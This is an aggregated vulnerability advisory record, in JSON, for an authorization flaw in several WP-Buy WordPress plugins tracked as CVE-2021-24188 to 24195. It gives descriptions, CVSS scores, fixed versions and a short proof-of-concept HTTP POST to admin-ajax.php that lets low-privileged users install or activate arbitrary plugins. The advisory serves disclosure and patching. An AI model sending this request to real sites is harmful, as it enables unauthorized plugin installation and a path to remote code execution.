Description
Low privileged users could use the AJAX action "cp_plugins_do_button_job_later_callback" from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE. Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog.
Related
{"id": "WPEX-ID:74889E29-5349-43D1-BAF5-1622493BE90C", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User ", "description": "Low privileged users could use the AJAX action \"cp_plugins_do_button_job_later_callback\" from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE. Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog. \n", "published": "2021-04-22T00:00:00", "modified": "2021-04-24T07:01:14", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "", "reporter": "Bugbang", "references": ["https://plugins.trac.wordpress.org/changeset/2494586/"], "cvelist": ["CVE-2021-24188", "CVE-2021-24189", "CVE-2021-24190", "CVE-2021-24191", "CVE-2021-24192", "CVE-2021-24193", "CVE-2021-24194", "CVE-2021-24195"], "immutableFields": [], "lastseen": "2021-05-28T19:26:14", "viewCount": 68, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24188", "CVE-2021-24189", "CVE-2021-24190", "CVE-2021-24191", "CVE-2021-24192", "CVE-2021-24193", "CVE-2021-24194", "CVE-2021-24195"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74889E29-5349-43D1-BAF5-1622493BE90C"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24188", "CVE-2021-24189", "CVE-2021-24190", "CVE-2021-24191", "CVE-2021-24192", "CVE-2021-24193", "CVE-2021-24194", "CVE-2021-24195"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74889E29-5349-43D1-BAF5-1622493BE90C"]}]}, "exploitation": null, "vulnersScore": 5.1}, "sourceData": "Vulnerable code : \r\n cp_plugins_do_button_job_later_callback() method in settings-start-index.php file\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nCookie: [Low Privilege User cookie]\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 46\r\n\r\naction=do_button_job_later&slug=plugin_slug.version\r\n\r\n\r\nTo activate installed plugins, use the same request, but with the plugin_file instead of slug parameter", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646116992}}
{"wpvulndb": [{"lastseen": "2021-05-28T19:26:14", "bulletinFamily": "software", "cvelist": ["CVE-2021-24188", "CVE-2021-24189", "CVE-2021-24190", "CVE-2021-24191", "CVE-2021-24192", "CVE-2021-24193", "CVE-2021-24194", "CVE-2021-24195"], "description": "Low privileged users could use the AJAX action \"cp_plugins_do_button_job_later_callback\" from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE. Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog. \n\n### PoC\n\nVulnerable code : cp_plugins_do_button_job_later_callback() method in settings-start-index.php file POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Cookie: [Low Privilege User cookie] Content-Type: application/x-www-form-urlencoded Content-Length: 46 action=do_button_job_later&slug;=plugin_slug.version To activate installed plugins, use the same request, but with the plugin_file instead of slug parameter\n", "modified": "2021-04-24T07:01:14", "id": "WPVDB-ID:74889E29-5349-43D1-BAF5-1622493BE90C", "href": "https://wpscan.com/vulnerability/74889e29-5349-43d1-baf5-1622493be90c", "published": "2021-04-22T00:00:00", "type": "wpvulndb", "title": "Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User ", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:48:57", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Captchinoo, Google recaptcha for admin login page WordPress plugin before 2.4, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24189", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24189"], "modified": "2021-05-26T16:20:00", "cpe": [], "id": "CVE-2021-24189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24189", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:49:00", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the WooCommerce Conditional Marketing Mailer WordPress plugin before 1.5.2, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24190", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24190"], "modified": "2021-05-21T21:11:00", "cpe": [], "id": "CVE-2021-24190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24190", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:49:02", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Tree Sitemap WordPress plugin before 2.9, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24192", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24192"], "modified": "2021-05-24T20:06:00", "cpe": [], "id": "CVE-2021-24192", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24192", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:48:56", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the WP Content Copy Protection & No Right Click WordPress plugin before 3.1.5, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24188", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24188"], "modified": "2021-05-24T12:53:00", "cpe": [], "id": "CVE-2021-24188", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24188", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:49:04", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Login Protection - Limit Failed Login Attempts WordPress plugin before 2.9, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24194", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24194"], "modified": "2021-05-24T20:07:00", "cpe": [], "id": "CVE-2021-24194", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24194", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:49:06", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Login as User or Customer (User Switching) WordPress plugin before 1.8, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24195", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24195"], "modified": "2021-05-24T13:58:00", "cpe": [], "id": "CVE-2021-24195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24195", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:49:02", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the WP Maintenance Mode & Site Under Construction WordPress plugin before 1.8.2, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24191", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24191"], "modified": "2021-05-24T20:05:00", "cpe": [], "id": "CVE-2021-24191", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24191", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:49:04", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Visitor Traffic Real Time Statistics WordPress plugin before 2.12, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24193", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24193"], "modified": "2021-05-21T21:05:00", "cpe": [], "id": "CVE-2021-24193", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24193", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:32:30", "description": "Arbitrary Plugin Installation and Activation vulnerability discovered by Bugbang in WordPress WP Maintenance Mode & Site Under Construction plugin (versions <= 1.8.1).\n\n## Solution\n\n\r\n Update the WordPress WP Maintenance Mode & Site Under Construction plugin to the latest available version (at least 1.8.2).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-22T00:00:00", "type": "patchstack", "title": "WordPress WP Maintenance Mode & Site Under Construction plugin <= 1.8.1 - Arbitrary Plugin Installation and Activation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24191"], "modified": "2021-04-22T00:00:00", "id": "PATCHSTACK:EDDAB308664EAD4B38A717FB15C8F6D0", "href": "https://patchstack.com/database/vulnerability/wp-maintenance-mode-site-under-construction/wordpress-wp-maintenance-mode-site-under-construction-plugin-1-8-arbitrary-plugin-installation-and-activation-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}
Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User
